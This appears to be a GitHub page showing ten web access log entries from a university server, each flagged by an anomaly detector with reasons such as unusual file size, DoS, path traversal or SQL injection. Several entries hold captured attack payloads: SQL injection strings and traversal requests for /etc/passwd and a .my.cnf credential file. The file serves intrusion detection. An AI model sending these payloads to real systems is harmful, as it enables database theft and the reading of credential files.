-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathtop10.log
19 lines (10 loc) · 4.14 KB
/
top10.log
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
1) 76.20.240.74 - - [04/Oct/2018:04:10:19 +0100] "GET /~hevrard/hidden_glfuzz/coverage_mesa-17-1-3_18May_130_noliterals_colorgrid_modulo_inv_variant_2/index.html HTTP/1.1" 200 2896484 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "1" "Unusual file size (2896484) for file of type .html"
2) 24.75.44.61 - - [01/Oct/2018:04:22:16 +0100] "GET /~dr/index.php?n=Main.Publications2004%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x HTTP/1.1" 404 292 "-" "-" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "3" "Detects MySQL comment-/space-obfuscated injections and backtick termination"
3) 5.62.34.31 - - [24/Oct/2018:12:15:08 +0100] "GET /~tora/previous/Robotics/index.cgi?page=../../../../../etc/passwd%00 HTTP/1.1" 200 1062 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "2" "Possible path traversal"
4) 40.77.189.239 - - [03/Oct/2018:00:47:24 +0100] "GET /~am411/Papaya/build/papaya.js?version=0.8&build=1028 HTTP/1.1" 200 1145526 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "1" "Unusual file size (1145526) for file of type .js"
5) 164.132.6.223 - - [03/Oct/2018:04:37:52 +0100] "GET /~rak/ HTTP/1.1" 200 74953 "https://www.doc.ic.ac.uk/~rak/" "7721" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "1" "Unusual user agent detected "7721""
6) 146.169.26.8 - - [22/Oct/2018:16:23:09 +0100] "GET /~ascalas/tmp/popl19/mpstk.git/objects/f7/428558be474617d3029f783d1d76bd1ef76067 HTTP/1.1" 200 217 "-" "git/2.7.4" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "3" "Possible (D)DoS (last request of flood reported) - 129 requests per second."
7) 104.196.16.49 - - [24/Nov/2018:23:30:04 +0000] "GET /~cristic/papers/w//wordpress//wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "2" "Possible path traversal"
8) 5.44.173.71 - - [06/Nov/2018:04:18:52 +0000] "GET /~wl/teachlocal/cuscomp/papers/soc-OverviewProcessors.pdfforumrunner/request.php?d=1&cmd=get_spam_data&postids=-1)union%20select%201,2,3,(select%20(@x)%20from%20(select%20(@x:=0x00),(select%20(table_name)%20from%20(information_schema.tables)where%20(table_schema=database())%20and%20(table_name%20REGEXP%200x7573657224)%20and%20(0x00)%20in%20(@x:=concat(@x,0x3D626173653D,table_name,0x3D626173653D))))x),5,6,7,8,9,10--%20- HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "3" "SQL Injection Attack: Common DB Names Detected"
9) 146.169.204.221 - mjk18 [27/Oct/2018:16:29:28 +0100] "GET /~nv516/coursework/feedback.cgi/haskell_crypto HTTP/1.1" 200 8229057 "https://www.doc.ic.ac.uk/~nv516/coursework/feedback.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "1" "Unusual file size (8229057) for file of type "
10) 185.229.190.184 - - [08/Oct/2018:05:37:43 +0100] "GET /project/2017/271/g1727136/web/recipe_info/index.php?recipe_id=999999.9+%0buNiOn%0baLl+%0bsElEcT+chr(65)||chr(66)||chr(67)||chr(49)||chr(52)||chr(53)||chr(90)||chr(81)||chr(54)||chr(50)||chr(68)||chr(87)||chr(81)||chr(65)||chr(70)||chr(80)||chr(79)||chr(73)||chr(89)||chr(67)||chr(70)||chr(68) HTTP/1.1" 200 3180 "https://www.doc.ic.ac.uk/project/2017/271/g1727136/web/recipe_info/index.php?recipe_id=999999.9+%0buNiOn%0baLl+%0bsElEcT+chr(65)||chr(66)||chr(67)||chr(49)||chr(52)||chr(53)||chr(90)||chr(81)||chr(54)||chr(50)||chr(68)||chr(87)||chr(81)||chr(65)||chr(70)||chr(80)||chr(79)||chr(73)||chr(89)||chr(67)||chr(70)||chr(68)" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "3" "SQL Injection Attack: SQL Operator Detected"